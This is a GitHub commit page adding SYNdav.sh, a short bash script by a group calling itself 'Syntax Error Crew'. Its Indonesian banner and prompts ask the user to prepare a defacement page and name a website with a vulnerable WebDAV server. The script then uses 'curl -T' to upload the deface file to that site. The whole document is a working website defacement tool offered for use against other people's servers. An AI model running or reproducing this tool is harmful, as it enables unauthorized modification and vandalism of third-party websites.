Skip to content

Commit b82f8f8

Browse files
authored
Create SYNdav.sh
1 parent 27e1518 commit b82f8f8

File tree

1 file changed

+22
-0
lines changed

1 file changed

+22
-0
lines changed

SYNdav.sh

+22
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
#! usr/bin/bash
2+
#Syntax Error Crew
3+
4+
apt-get install curl -y
5+
clear
6+
7+
echo "
8+
_______ __ __ __ _ ______ _______ _ _
9+
|______ \_/ | \ | | \ |_____| \ /
10+
______| | | \_| |_____/ | | \/
11+
{+}---------------------------------SYNdav---{+}
12+
| Syntax Error Crew || Tools WebDav || 6juni |
13+
{+}------------------------------------------{+}
14+
| NB | Buat Script Deface Dahulu |
15+
{+}----------------------------IKUTI-STEPNYA-{+}
16+
| {√} | Masukkan Website Vuln Webdav |"
17+
read -p " | {√} | Website : " syntax;
18+
read -p " | {√} | SC Deface : " crew;
19+
echo "{+}-------------------------------PROSES-----{+}"
20+
curl -T $HOME/SYNdav/$crew $syntax
21+
sleep 3
22+
echo "[√]--->DONE, CEK WEBSITENYA"

0 commit comments

Comments
 (0)